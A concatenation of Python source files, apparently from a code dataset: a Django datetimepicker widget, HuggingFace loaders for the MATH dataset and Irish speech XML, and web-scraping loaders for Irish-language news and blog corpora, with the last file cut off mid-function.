self.option += (options.get('minView','0'),)
self.option += (options.get('maxView','4'),)
self.option += (options.get('todayBtn','false'),)
self.option += (options.get('todayHighlight','false'),)
self.option += (options.get('minuteStep','5'),)
self.option += (options.get('pickerPosition','bottom-right'),)
self.option += (options.get('showMeridian','false'),)
pattern = re.compile(r'\b(' + '|'.join(dateConversion.keys()) + r')\b')
self.dataTimeFormat = self.option[0]
self.format = pattern.sub(lambda x: dateConversion[x.group()], self.option[0])
widgets = (DateTimeInput(attrs=attrs,format=self.format),)
super(DateTimeWidget, self).__init__(widgets, attrs)
def value_from_datadict(self, data, files, name):
date_time = [
widget.value_from_datadict(data, files, name + '_%s' % i)
for i, widget in enumerate(self.widgets)]
try:
D = to_current_timezone(datetime.strptime(date_time[0], self.format))
except ValueError:
return ''
else:
return str(D)
def decompress(self, value):
if value:
value = to_current_timezone(value)
return (value,)
return (None,)
def format_output(self, rendered_widgets):
"""
Given a list of rendered widgets (as strings), wraps them in the
Bootstrap datetimepicker markup and initialisation script.
Returns a Unicode string representing the HTML for the whole lot.
"""
WEEKDAYS = [ _("Sunday"), _("Monday"), _("Tuesday"), _("Wednesday"), _("Thursday"), _("Friday"), _("Saturday"), _("Sunday")]
WEEKDAYS_ABBR = [_("Sun"), _("Mon"), _("Tue"), _("Wed"), _("Thu"), _("Fri"), _("Sat"), _("Sun")]
WEEKDAYS_MIN = [_("Su"), _("Mo"), _("Tu"), _("We"), _("Th"), _("Fr"), _("Sa"), _("Su")]
MONTHS = [_("January"), _("February"), _("March"), _("April"), _("May"), _("June"), _("July"), _("August"), _("September"), _("October"), _("November"), _("December")]
MONTHS_ABBR = [_("Jan"), _("Feb"), _("Mar"), _("Apr"), _("May"), _("Jun"), _("Jul"), _("Aug"), _("Sep"), _("Oct"), _("Nov"), _("Dec")]
MERDIEM = [_("am"), _("pm")]
SUFFIX = [_("st"), _("nd"), _("rd"), _("th")]
TODAY = "'%s'"%_("Today")
js_i18n = I18N % (WEEKDAYS,WEEKDAYS_ABBR, WEEKDAYS_MIN, MONTHS, MONTHS_ABBR, MERDIEM, SUFFIX, TODAY)
options = self.option+(translation.get_language(),)
js_options = datetimepicker_options % options
id = uuid.uuid4().hex
return '<div id="%s" class="input-append date form_datetime">'\
'%s'\
'<span class="add-on"><i class="icon-th"></i></span>'\
'</div>'\
'<script type="text/javascript">'\
'%s$("#%s").datetimepicker({%s});'\
'</script> ' % ( id, rendered_widgets[0], js_i18n.replace(', u\'',', \'').replace('[u', '['), id , js_options)
class Media:
css = {
'all' : ('css/datetimepicker.css',)
}
js = (
"js/bootstrap-datetimepicker.js",
)
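# --- Usage sketch (illustrative only; the form, field and option values below
# are placeholders chosen for the example, not part of the original widget) ---
#
# from django import forms
# from datetimewidget.widgets import DateTimeWidget
#
# class EventForm(forms.Form):
#     start = forms.DateTimeField(
#         widget=DateTimeWidget(options={'format': 'dd/mm/yyyy hh:ii',
#                                        'autoclose': 'true'}))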
``` |
{
"source": "jimregan/datasets",
"score": 3
} |
#### File: datasets/competition_math/competition_math.py
```python
import glob
import json
import os
import datasets
_CITATION = """\
@article{hendrycksmath2021,
title={Measuring Mathematical Problem Solving With the MATH Dataset},
author={<NAME>
and <NAME>
and <NAME>
and <NAME>
and <NAME>
and <NAME>
and <NAME>
and <NAME>},
journal={arXiv preprint arXiv:2103.03874},
year={2021}
}
"""
_DESCRIPTION = """\
The Mathematics Aptitude Test of Heuristics (MATH) dataset consists of problems
from mathematics competitions, including the AMC 10, AMC 12, AIME, and more.
Each problem in MATH has a full step-by-step solution, which can be used to teach
models to generate answer derivations and explanations.
"""
_HOMEPAGE = "https://github.com/hendrycks/math"
_LICENSE = "https://github.com/hendrycks/math/blob/main/LICENSE"
_URL = "https://people.eecs.berkeley.edu/~hendrycks/MATH.tar"
class CompetitionMathDataset(datasets.GeneratorBasedBuilder):
"""Mathematics Aptitude Test of Heuristics (MATH) dataset."""
VERSION = datasets.Version("1.0.0")
def _info(self):
features = datasets.Features(
{
"problem": datasets.Value("string"),
"level": datasets.Value("string"),
"type": datasets.Value("string"),
"solution": datasets.Value("string"),
}
)
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=features,
supervised_keys=None,
homepage=_HOMEPAGE,
license=_LICENSE,
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
download_dir = dl_manager.download_and_extract(_URL)
math_dir = os.path.join(download_dir, "MATH")
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={"math_dir": math_dir, "split": "train"},
),
datasets.SplitGenerator(
name=datasets.Split.TEST,
gen_kwargs={"math_dir": math_dir, "split": "test"},
),
]
def _generate_examples(self, math_dir, split):
"""Yields examples as (key, example) tuples."""
filepaths = glob.glob(os.path.join(math_dir, split, "*/*"))
for id_, filepath in enumerate(filepaths):
with open(filepath, "rb") as fin:
example = json.load(fin)
yield id_, example
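# --- Usage sketch (illustrative; assumes the `datasets` library is installed
# and this script is loadable under the name used below) ---
#
# from datasets import load_dataset
# math_ds = load_dataset("competition_math")
# print(math_ds["train"][0]["problem"])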
``` |
{
"source": "jimregan/notes",
"score": 2
} |
#### File: notes/_drafts/abairxml.py
```python
import os
from pathlib import Path
import re
import io
import datasets
import xml.etree.ElementTree as ET
import xml.sax.saxutils as saxutils
_DESCRIPTION = """\
Builds a dataset from a directory containing utterance XML files.
If you're not in the TCD phonetics lab, this is of no use to you.
"""
logger = datasets.utils.logging.get_logger(__name__)
class UtteranceXMLDataset(datasets.GeneratorBasedBuilder):
"""Speech dataset from data annotated with utternance XML."""
VERSION = datasets.Version("1.1.0")
BUILDER_CONFIGS = [
datasets.BuilderConfig(name="utterance", version=VERSION),
]
def _info(self):
features = datasets.Features(
{
"file_id": datasets.Value("string"),
"words": datasets.Value("string"),
"phonemes": datasets.Sequence(datasets.Value("string")),
"audio": datasets.Value("string"),
"dialect": datasets.Value("string"),
"language": datasets.Value("string"),
"speaker_id": datasets.Value("string"),
"audio_set": datasets.Value("string")
}
)
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=features,
supervised_keys=None,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
manual_dir = os.path.abspath(os.path.expanduser(dl_manager.manual_dir))
if not os.path.exists(manual_dir):
raise FileNotFoundError(
"{} does not exist. Make sure you insert a manual dir via `datasets.load_dataset('phonlab-tcd/utterance-xml', data_dir=...)` with the path to the corpus directory".format(
manual_dir
)
)
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={
"data_dir": manual_dir,
"split": "train",
},
),
]
def _generate_examples(
self, data_dir, split
):
""" Yields examples as (key, example) tuples. """
matcher = re.match(".*/([a-z]{3})_ga_(ul|mu|co)[_/](.*)/?$", data_dir)
matcher2 = re.match(".*/ga_(UL|MU|CP)/([a-z]{3})/([^/]*)/?$", data_dir)
matcher_en = re.match(".*/([a-z]{3})_en_ie", data_dir)
if matcher:
speaker_id = matcher.group(1)
language = "ga"
dialect = matcher.group(2)
audio_set = matcher.group(3)
elif matcher2:
speaker_id = matcher2.group(2)
language = "ga"
dialect = matcher2.group(1).lower()
audio_set = matcher2.group(3)
elif matcher_en:
language = "en"
dialect = "ie"
speaker_id = matcher_en.group(1)
audio_set = f"{speaker_id}_en_ie"
elif "mul_ga_msf" in data_dir:
language = "ga"
dialect = "mu"
speaker_id = "mul"
audio_set = "msf"
else:
raise Exception(f"{data_dir} {type(data_dir)} doesn't look like a valid path")
dd_path = Path(data_dir)
xml_path = dd_path / "xml"
if not xml_path.is_dir():
xml_path = dd_path / "xmlproc"
_AUDIO = ["wav", "wav16", "wav44", "wav_trimmed", "wav16_trimmed", "wav44_trimmed", "ogg"]
_id = 1
for xmlfile in xml_path.glob("*.xml"):
utt = from_xml(xmlfile)
words = utt_to_words(utt)
phonemes = utt_to_phonemes(utt)
assert len(words) == len(phonemes)
file_id = xmlfile.stem
audio = ""
for wd in _AUDIO:
try_path = dd_path / wd
ext = "ogg" if wd == "ogg" else "wav"
stem = xmlfile.stem
if 'tcd_gd_text02_' in stem:
stem = stem.replace('tcd_gd_text02_', 'tcd_gd_text02-')
audio = try_path / f"{stem}.{ext}"
if audio.is_file():
break
if audio == "":
logger.info("failed to find audio to match XML: %s", xmlfile)
continue
for pair in zip(words, phonemes):
yield _id, {
"speaker_id": speaker_id,
"file_id": file_id,
"audio": str(audio),
"phonemes": pair[1],
"words": irish_lc(" ".join(pair[0])),
"language": language,
"dialect": dialect,
"audio_set": audio_set
}
_id += 1
class Utterance:
def __init__(self, input, sentences, spoken_like=None):
self.input = input
self.sentences = sentences
if spoken_like is None:
self.spoken_as = []
else:
self.spoken_as = spoken_like
def maybe_xml(self):
return "<" in self.input
def get_xml(self):
if self.maybe_xml():
return "<utt>" + saxutils.unescape(self.input) + "</utt>"
else:
return None
def get_spoken_like(self):
if not self.maybe_xml():
return
source = io.StringIO(self.get_xml())
tree = ET.parse(source)
root = tree.getroot()
slikes = set()
for sl in root.findall('./spoken-like'):
if 'orth' in sl.attrib:
orth = sl.attrib['orth'].strip()
text = sl.text.strip()
slikes.add((text, orth))
return list(slikes)
class Sentence:
def __init__(self, input, tokens):
self.input = input
self.tokens = tokens
class Token:
def __init__(self, input, words):
self.input = input
self.words = words
class Word:
def __init__(self, input, source, syllables):
self.input = input
self.source = source
self.syllables = syllables
if self.syllables is None:
self.syllables = []
def skippable(self):
if self.input in ["SILENCE_TOKEN", "GLOTTAL_STOP"]:
return True
if len(self.syllables) == 1 \
and len(self.syllables[0].phonemes) == 1 \
and self.syllables[0].phonemes[0].skippable():
return True
return False
class Syllable:
def __init__(self, stress: int = 0, phonemes = None):
self.stress = stress
self.phonemes = phonemes
if self.phonemes is None:
self.phonemes = []
class Phoneme:
def __init__(self, symbol: str = "", end: float = 0.0):
self.symbol = symbol
self.end = end
def skippable(self):
return self.symbol == "sil"
def from_xml(source):
tree = ET.parse(source)
root = tree.getroot()
if 'input_string' in root.attrib:
input = root.attrib['input_string']
else:
input = ''
sentences = []
for sentence in root.findall('./sentence'):
if 'input_string' in sentence.attrib:
input = sentence.attrib['input_string']
else:
input = ''
tokens = []
for token in sentence.findall('./token'):
if 'input_string' in token.attrib:
input = token.attrib['input_string']
else:
input = ''
words = []
for word in token.findall('./word'):
if 'input_string' in word.attrib:
input = word.attrib['input_string']
else:
input = ""
if 'trans_source' in word.attrib:
source = word.attrib['trans_source']
else:
source = ""
syllables = []
for syllable in word.findall('./syllable'):
phonemes = []
if 'stress' in syllable.attrib:
if syllable.attrib['stress'] == 'None':
stress = 0
else:
stress = int(syllable.attrib['stress'])
else:
stress = 0
for phoneme in syllable.findall('./phoneme'):
if 'symbol' in phoneme.attrib:
symbol = phoneme.attrib['symbol']
else:
symbol = ''
if 'end' in phoneme.attrib:
end = float(phoneme.attrib['end'])
else:
end = 0.0
phonemes.append(Phoneme(symbol, end))
syllables.append(Syllable(stress, phonemes))
words.append(Word(input, source, syllables))
tokens.append(Token(input, words))
sentences.append(Sentence(input, tokens))
return Utterance(input, sentences)
def is_punct(tok):
return tok in [".", ","]
def utt_to_words(utterance: Utterance):
sentences = []
for sentence in utterance.sentences:
words = []
for token in sentence.tokens:
for word in token.words:
if word.skippable():
continue
else:
words.append(word.input)
sentences.append(words)
return sentences
def utt_to_phonemes(utterance: Utterance):
sentences = []
for sentence in utterance.sentences:
phonemes = []
for token in sentence.tokens:
for word in token.words:
for syllable in word.syllables:
for phoneme in syllable.phonemes:
if phoneme.skippable():
continue
else:
phonemes.append(phoneme.symbol)
sentences.append(phonemes)
return sentences
def _irish_lc_word(word: str) -> str:
if word[0:1] in ["n", "t"] and word[1:2] in "AEIOUÁÉÍÓÚ":
return word[0:1] + "-" + word[1:].lower()
else:
return word.lower()
def irish_lc(string: str) -> str:
return " ".join(list(map(_irish_lc_word, string.split(" "))))
```
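A short sketch of the Irish lower-casing helper defined above (the module name is assumed from the file path):
```python
from abairxml import irish_lc  # module name assumed from the file path
# t- and n- prefixes before a capital vowel keep a hyphen instead of being folded in.
print(irish_lc("Tá an tUachtarán anseo"))  # -> tá an t-uachtarán anseo
print(irish_lc("Ná habair é"))             # -> ná habair é
```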
#### File: notes/_drafts/corpuscrawler-irish.py
```python
import collections
import os
import re
import struct
import unicodedata
import base64
import hashlib
from html.entities import name2codepoint
from email import message_from_string as Message
from urllib.parse import urlparse
from pathlib import Path
import datasets
_DESCRIPTION = """\
Irish web corpus, crawled with Corpus Crawler.
Uses a list of URLs, collected by the crawler, to
retrieve the files from the crawler's cache.
"""
#_SCRAPES = ["20180911", "20191117", "20210810"]
_SCRAPES = ["20191117", "20210810"]
logger = datasets.utils.logging.get_logger(__name__)
_DATA_URL = 'https://huggingface.co/datasets/phonlab-tcd/corpuscrawler-ga/raw/main/crawled-{}.txt'
class CorpusCrawlerIrish(datasets.GeneratorBasedBuilder):
"""Corpus Crawler crawled text dataset."""
BUILDER_CONFIGS = [
datasets.BuilderConfig(name=f"{scrape}_{cfg}")
for scrape in _SCRAPES
for cfg in ["documents", "paragraphs"]
]
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{
"url": datasets.Value("string"),
"genre": datasets.Value("string"),
"publication_date": datasets.Value("string"),
"title": datasets.Value("string"),
"text": datasets.Value("string"),
"video_url": datasets.Value("string"),
}
),
)
def _split_generators(self, dl_manager):
manual_dir = os.path.abspath(os.path.expanduser(dl_manager.manual_dir))
scrape_set = self.config.name
sset = self.config.name.split('_')[0]
dl_path = dl_manager.download(_DATA_URL.format(sset))
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={
"name": scrape_set,
"data_dir": manual_dir,
"data_file": dl_path,
})
]
def _generate_examples(self, name, data_dir, data_file):
"""Generate examples from a Corpus Crawl cache."""
logger.info("generating examples from = %s", name)
scfg = self.config.name.split('_')[1]
links = _get_links(data_file)
if not self.config.data_dir:
self.config.data_dir = data_dir
dd_path = Path(data_dir)
if not dd_path.is_dir():
raise Exception('No directory: ' + data_dir)
_id = 1
for link in links:
if not link:
continue
res = self._fetch_page(link, data_dir)
if res is None:
raise Exception("Failed to read " + link + " from " + data_dir)
if scfg == "documents":
text = ["\n".join(res.get('text', []))]
else:
text = res.get('text', [])
for para in text:
example = {
"genre": res.get('genre', ''),
"url": res.get('location', link),
"publication_date": res.get('publication-date', ''),
"video_url": res.get('video', ''),
"title": res.get('title', ''),
"text": para
}
yield _id, example
_id += 1
def _fetch_page(self, url, data_dir):
_EXTRATORS = {
'www.unicode.org': do_udhr,
'tuairisc.ie': do_tuairisc_ie,
'www.rte.ie': do_nuachtrte,
'www.irishtimes.com': do_irishtimes,
'www.chg.gov.ie': do_chg,
'www.ainm.ie': do_ainm_ie,
'gaeltacht21.blogspot.com': do_blogspot,
'aonghus.blogspot.com': do_blogspot,
'nimill.blogspot.com': do_blogspot,
'turasailse.blogspot.com': do_blogspot,
'caomhach.blogspot.com': do_blogspot,
'breacleabhar.blogspot.com': do_blogspot,
'gearoid.blogspot.com': do_blogspot,
'philo-celtic.blogspot.com': do_blogspot,
'iomhannablag.blogspot.com': do_blogspot,
'smaointefanacha.blogspot.com': do_blogspot,
'imeall.blogspot.com': do_blogspot,
'coislife.ie': do_coislife_ie,
'meoneile.ie': do_meoneile_ie,
'peig.ie': do_peig_ie,
'www.forasnagaeilge.ie': do_forasnagaeilge_ie,
}
parsed_url = urlparse(url)
host = parsed_url.netloc
extract = _EXTRATORS.get(host)
if extract:
fr = fetch(data_dir, url)
if fr is None:
raise Exception("Failed to fetch " + url + " from " + data_dir)
return extract(fr)
# Corpus Crawler: utils.py
_TAG_REGEX = re.compile(r'\<.+?\>', flags=re.DOTALL)
def striptags(s):
return _TAG_REGEX.sub('', s)
def unichar(i):
try:
return chr(i)
except ValueError:
# non-BMP codepoint in narrow Python build
return struct.pack('i', i).decode('utf-32')
def replace_html_entities(html):
entities = name2codepoint
html = re.sub(r'&#([0-9]+);',
lambda z:unichar(int(z.group(1))), html)
html = re.sub(r'&#[xX]([0-9a-fA-F]+);',
lambda z:unichar(int(z.group(1), 16)), html)
html = re.sub(r'&([a-zA-Z]+);',
lambda z:unichar(entities.get(z.group(1).lower(), 0x20)), html)
return html
def cleantext(html):
html = re.sub(r'<script.+?</script>', ' ', html, flags=re.DOTALL)
html = replace_html_entities(striptags(html))
# Some web sites insert zero-width spaces, possibly as byte order marks
# (from Microsoft Notepad) which their scripts failed to recognize as such.
html = html.replace('\u200B', '')
return unicodedata.normalize('NFC', ' '.join(html.split()))
def clean_paragraphs(html):
text = html.replace('\n', ' ')
text = re.sub(r'</(?:div|DIV|p|P|[hH][1-6]|table|TABLE|tr|td|article)>',
'\n', text)
text = re.sub(r'<(?:br|BR)\s*/?>', '\n', text)
return list(filter(None, [cleantext(p) for p in text.split('\n')]))
def extract(before, after, html):
s = html.split(before, 1)
return s[1].split(after)[0] if len(s) == 2 else None
FetchResult = collections.namedtuple('FetchResult',
['headers', 'content', 'url', 'filepath'])
def fetch(cache_dir, url):
logger.info("fetching url %s from cache %s", url, cache_dir)
try:
digest = hashlib.sha256(url.encode('utf-8')).digest()
filepath = os.path.join(cache_dir,
"f" + base64.urlsafe_b64encode(digest).decode('utf-8'))
except:
digest = hashlib.sha256(url).digest()
filepath = os.path.join(cache_dir,
"f" + base64.urlsafe_b64encode(digest))
fp = Path(filepath)
if not fp.is_file():
raise Exception("No such file: " + fp)
try:
with open(filepath, 'r', encoding='utf-8-sig', newline='') as f:
file_content = f.read()
if '\r\n\r\n\r\n' in file_content:
splitter = '\r\n\r\n\r\n'
else:
splitter = '\n\n\n'
cached = file_content.split(splitter, 1)
if len(cached) == 2:
headers, content = cached
try:
content = content.encode('utf-8')
except:
# already encoded as bytes
pass
headers = Message(headers)
if not content:
raise Exception("empty content")
return FetchResult(headers, content, url, filepath)
else:
raise Exception("splitting headers and content failed")
except IOError:
raise Exception("fetch() failed")
def do_udhr(fetchresult):
out = {}
text = fetchresult.content.decode('utf-8').split('---', 1)[1]
out['location'] = fetchresult.url
out['genre'] = 'Legal'
paras = []
for paragraph in text.splitlines():
paragraph = paragraph.strip()
if len(paragraph) > 0:
paras.append(paragraph)
out['text'] = paras
return out
# corpuscrawler: crawl_ga.py
_ENGLISH_MONTHS = {
'january': 1,
'february': 2,
'march': 3,
'april': 4,
'may': 5,
'june': 6,
'july': 7,
'august': 8,
'september': 9,
'october': 10,
'november': 11,
'december': 12
}
def _byline_to_pubdate(byline):
date = re.search(r'(\d{1,2}) ([^ ]+?) (\d{4})', byline)
if not date:
return None
day = int(date.group(1))
year = int(date.group(3))
month = _ENGLISH_MONTHS[date.group(2).lower()]
if not month:
return None
out = "{}-{:0>2d}-{:0>2d}".format(year, month, day)
return out
def _rte_writable_paragraph(text):
if text == '':
return False
if text.startswith('© RTÉ '):
return False
if text.startswith('By using this website, you consent'):
return False
if text.startswith('RTÉ.ie is the website of Raidió Te<NAME>'):
return False
if text.find('is not responsible for the content') >= 0:
return False
if text.find('RTÉ uses cookies in accordance with our Cookie Policy') >= 0:
return False
if re.match('^[\*\+]+$', text):
return False
return True
def _rte_cleanall(html):
    section_article_regex = re.compile(r'<section[^>]+itemprop="articleBody"[^>]*>')
    search = section_article_regex.search(html)
    out = []
    if search:
        body = extract(search.group(0), '</section>', html)
        for para in clean_paragraphs(body):
            if _rte_writable_paragraph(para):
                out.append(para)
        return out
    for paragraph in re.findall(r'<p>(.+?)</p>', html):
        cleaned = cleantext(paragraph)
        if _rte_writable_paragraph(cleaned):
            out.append(cleaned)
    return out
def _sceala_clean(paras):
    # Cleaned paragraphs contain no newlines, so look for the '____'
    # signature separator at the start of (or inside) a paragraph.
    out = []
    for para in paras:
        if para.startswith('____'):
            break
        if '____' in para:
            out.append(para.split('____')[0].rstrip())
            break
        out.append(para)
    return out
def do_nuachtrte(fetchresult):
out = {}
pubdate_regex = re.compile(r'name="DC.date" (?:scheme="DCTERMS.URI" )?content="([0-9T:+\-]{19,25})"')
html = fetchresult.content.decode('utf-8')
pubdate_match = pubdate_regex.search(html)
pubdate = pubdate_match.group(1) if pubdate_match else None
if pubdate is None: pubdate = fetchresult.headers.get('Last-Modified')
out['location'] = fetchresult.url
if 'nuacht' in fetchresult.url:
out['genre'] = 'News'
if pubdate:
out['publication-date'] = pubdate
title = re.search(r'<title>(.+?)</title>', html)
if title:
title = striptags(title.group(1).split('- RTÉ')[0]).strip()
if title:
out['title'] = cleantext(title)
cleaned = _rte_cleanall(html)
if '/sceala/' in fetchresult.url:
cleaned = _sceala_clean(cleaned)
out['text'] = cleaned
return out
def do_meoneile_ie(fetchresult):
out = {}
html = fetchresult.content.decode('utf-8')
    title = (extract('<title>', '</title>', html) or '').strip()
    title = title.split('<')[0].strip() if title else ''
video = re.search(r"<iframe.*src='(//player.vimeo.com/video/[0-9]+)[^>]*></iframe>", html)
body = extract("<div class='article-content'>", '</article>', html) or ''
byline = extract("<div class='byline'>", '</span>', html) or ''
byline = _byline_to_pubdate(byline)
if title:
out['title'] = title
paras = clean_paragraphs(body)
if paras:
out['location'] = fetchresult.url
out['genre'] = 'News'
if video:
out['video'] = f'https:{video.group(1)}'
if byline:
out['publication-date'] = byline
paras_filt = []
for para in paras:
if para == 'Roinn':
continue
else:
paras_filt.append(para)
out['text'] = paras_filt
return out
def do_irishtimes(fetchresult):
out = {}
html = fetchresult.content.decode('utf-8')
pubdatere1 = re.compile(r'<meta itemprop="datePublished" content="([^"]*)"/>')
    pubdatere2 = re.compile(r'"datePublished": "([^"]+)"')
out['location'] = fetchresult.url
out['genre'] = 'News'
title = re.search(r'<title>(.+?)</title>', html)
pubdate_match = pubdatere1.search(html)
pubdate_match = pubdate_match if pubdate_match else pubdatere2.search(html)
pubdate = pubdate_match.group(1) if pubdate_match else None
if pubdate is None:
pubdate = fetchresult.headers.get('Last-Modified')
if pubdate:
out['publication-date'] = pubdate
if title:
out['title'] = cleantext(title.group(1))
paras = []
for paragraph in re.findall(
r'<p class="no_name">(.+?)</p>',
html.split('<div class="article_bodycopy">')[1]):
cleaned = cleantext(paragraph)
paras.append(cleaned)
    out['text'] = paras
    return out
def do_blogspot(fetchresult):
out = {}
pubdate_regex = re.compile(
r"<abbr class='published' title='([^']*)'>[^<]*</abbr>")
html = fetchresult.content.decode('utf-8')
pubdate_match = pubdate_regex.search(html)
pubdate = pubdate_match.group(1) if pubdate_match else None
if pubdate is None: pubdate = fetchresult.headers.get('Last-Modified')
title = re.search(r"<meta content='([^']+)' property='og:title'/>",
html)
title = title.group(1) if title else ''
post = extract("<div class='post-body entry-content'>",
"<div class='post-footer'>", html)
    if post is None:
        post = extract("<div class='post-header'>",
                       "<div class='post-footer'>", html)
    if post is None:
        post = extract('<div class="post-body">',
                       '<p class="post-footer">', html)
    paras = clean_paragraphs(post or '')
if paras:
out['title'] = title
out['location'] = fetchresult.url
out['genre'] = 'News'
if pubdate:
out['publication-date'] = pubdate
out['text'] = paras
return out
def do_ainm_ie(fetchresult):
out = {}
html = fetchresult.content.decode('utf-8')
title = re.search(r'<title>(.+?)</title>', html)
title = title.group(1).split('|')[0] if title else ''
body = extract('<div class="article">',
'<!-- .contentWrapper-->', html) or ''
body = body.split('<div id="machines"')[0]
paras = clean_paragraphs(body)
pubdate = fetchresult.headers.get('Last-Modified')
if paras:
out['title'] = title
out['location'] = fetchresult.url
out['genre'] = 'Biography'
if pubdate:
out['publication-date'] = pubdate
out['text'] = paras
return out
def do_tuairisc_ie(fetchresult):
out = {}
pubdate_regex = re.compile(
r'<time datetime="(20\d\d-\d\d-\d\d)\s+(\d\d:\d\d)" '
r'itemprop="datePublished">')
html = fetchresult.content.decode('utf-8')
title = extract('<h1 class="title article--full__title">', '</h1>',
html) or ''
    pubdate_match = pubdate_regex.search(html)
    pubdate = None
    if pubdate_match:
        pubdate = '%sT%s:00Z' % (
            pubdate_match.group(1), pubdate_match.group(2))
body = extract(
'<div class="article--full__content" itemprop="articleBody">',
'</article>', html)
if body:
paras = clean_paragraphs(body)
if paras:
out['title'] = title
out['location'] = fetchresult.url
out['genre'] = 'News'
if pubdate:
out['publication-date'] = pubdate
out['text'] = paras
return out
def do_coislife_ie(fetchresult):
out = {}
html = fetchresult.content.decode('utf-8')
title = re.search(r'<title>(.+?)</title>', html)
title = title.group(1).split('–')[0].strip() if title else ''
    desc = re.search(r'<meta property="og:description" content="([^"]+?)"', html)
    desc = cleantext(desc.group(1)) if desc else ''
body = extract('<div class="tab-content">',
'<div class="entry-content in fade tab-pane" id="tab-additional_information">', html) or ''
paras = clean_paragraphs(title + '<br/>' + body)
pubdate = fetchresult.headers.get('Last-Modified')
if paras:
out['title'] = title
out['location'] = fetchresult.url
out['genre'] = 'Commerce'
if desc:
out['description'] = desc
if pubdate:
out['publication-date'] = pubdate
outp = []
for para in paras:
if para.find('<NAME> as an leabhar') >= 0:
continue
else:
outp.append(para)
out['text'] = outp
return out
def do_chg(fetchresult):
out = {}
def _chg_content(page):
return page.split('<div class="container" id="article">')[1].split('<!-- /.right columns -->')[0]
phtml = fetchresult.content.decode('utf-8')
ptext = _chg_content(phtml)
title = re.search(r'<title>(.+?)</title>', phtml)
if title: title = striptags(title.group(1).split('|')[0]).strip()
pubdate = fetchresult.headers.get('Last-Modified')
out['location'] = fetchresult.url
out['genre'] = 'Government'
if pubdate:
out['publication-date'] = pubdate
if title:
out['title'] = title
paras = []
for paragraph in re.findall(r'<p>(.+?)</p>', ptext):
cleaned = cleantext(paragraph)
paras.append(cleaned)
out['text'] = paras
return out
def do_peig_ie(fetchresult):
out = {}
def peig_cat(page):
if page.find('/imeachtai/') >= 0:
return 'Events'
elif page.find('peig.ie/20') >= 0:
return 'News'
elif page.find('/fol%C3%BAntais/') >= 0:
return 'Job listings'
else:
return ''
# Peig.ie has a lot of posts from other sites
html = fetchresult.content.decode('utf-8')
title = re.search(r'<title>(.+?)</title>', html)
title = title.group(1).split('|')[0].strip() if title else ''
if '<meta property="article:modified_time"' in html:
date = re.search(r'<meta property="article:modified_time" content="([^"]+)"', html).group(1)
else:
date = re.search(r'"datePublished":"([^"]+)"', html).group(1)
body = extract('<div class="uk-margin-medium-top" property="text">', '<ul class="uk-pagination', html) or ''
paras = clean_paragraphs(body)
genre = peig_cat(fetchresult.url)
if paras:
out['location'] = fetchresult.url
if title:
out['title'] = title
if genre:
out['genre'] = genre
if date:
out['publication-date'] = date
out['text'] = paras
return out
def do_forasnagaeilge_ie(fetchresult):
out = {}
pubdate_regex = re.compile(r'"datePublished":"([^"]+)",')
html = fetchresult.content.decode('utf-8')
if '<html class="no-js" lang="en">' in html:
return {}
title = extract('<title>', ' - www.forasnagaeilge.ie</title>',
html) or ''
    pubdate_match = pubdate_regex.search(html)
    pubdate = pubdate_match.group(1) if pubdate_match else None
body = extract(
'<div id="main" class="container">',
'</div><!-- /.content -->', html)
if body:
paras = clean_paragraphs(body)
if paras:
out['location'] = fetchresult.url
out['genre'] = 'News'
if title:
out['title'] = title
if pubdate:
out['publication-date'] = pubdate
out['text'] = paras
return out
def _get_links(scrape):
links = set()
if not os.path.exists(scrape):
raise Exception(f"File {scrape} does not exist")
with open(scrape) as f:
for url in f.readlines():
links.add(url.rstrip())
return list(links)
```
#### File: notes/_drafts/nos.py
```python
import re
import datasets
from bs4 import BeautifulSoup
import requests
_DESCRIPTION = """\
Nós is an Irish-language magazine site.
This script crawls the Nós website to create a text dataset.
"""
class NosDataset(datasets.GeneratorBasedBuilder):
"""Scraper dataset for Nós."""
VERSION = datasets.Version("1.1.0")
BUILDER_CONFIGS = [
datasets.BuilderConfig(name="documents", version=VERSION, description="Plain text portion of the corpus: whole documents"),
datasets.BuilderConfig(name="paragraphs", version=VERSION, description="Plain text portion of the corpus: paragraphs"),
]
def _info(self):
features = datasets.Features(
{
"title": datasets.Value("string"),
"subtitle": datasets.Value("string"),
"url": datasets.Value("string"),
"author": datasets.Value("string"),
"date": datasets.Value("string"),
"text": datasets.Value("string"),
"video_url": datasets.Value("string"),
"categories": datasets.Sequence(datasets.Value("string")),
"tags": datasets.Sequence(datasets.Value("string")),
}
)
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=features,
supervised_keys=None,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={
"split": "train",
},
),
]
def _generate_examples(
self, split
):
""" Yields examples as (key, example) tuples. """
menu_links = _read_menu()
articles = _get_article_list(menu_links)
_id = 1
for url in articles:
page = requests.get(url)
soup = BeautifulSoup(page.text, 'lxml')
title = _get_title(soup)
subtitle = _get_subhead(soup)
details = _get_details(soup)
paras = _get_text(soup)
video = _get_video(soup)
if self.config.name == "documents":
paras = ['\n'.join(paras)]
for para in paras:
yield _id, {
"title": title,
"subtitle": subtitle,
"url": url,
"author": details.get("author", ""),
"date": details.get("date", ""),
"categories": details.get("categories", []),
"tags": details.get("tags", []),
"video_url": video,
"text": para
}
_id += 1
def _get_title(soup):
    title_tag = soup.find('title')
    if title_tag and title_tag.text and title_tag.text.strip() != "":
        return title_tag.text.strip()
    ogtitle = soup.find("meta", {"property": "og:title"})
    ogtitle_text = ogtitle.get('content', '') if ogtitle else ''
    if ogtitle_text and ogtitle_text.strip() != "":
        return ogtitle_text.strip()
    return ''
def _get_text(soup):
out = []
content = soup.find("div", {"id": "single-area-center"})
for para in content.find_all('p'):
if para.text and para.text.strip() != "":
out.append(para.text.strip().replace('\xa0', ' '))
return out
def _get_video(soup):
vid = soup.find('div', {'id': 'video-wrapper'})
if vid:
iframe = vid.find('iframe')
if iframe:
return iframe.get('src', '')
return ''
def _get_subhead(soup):
    content = soup.find("div", {"id": "single-area-center"})
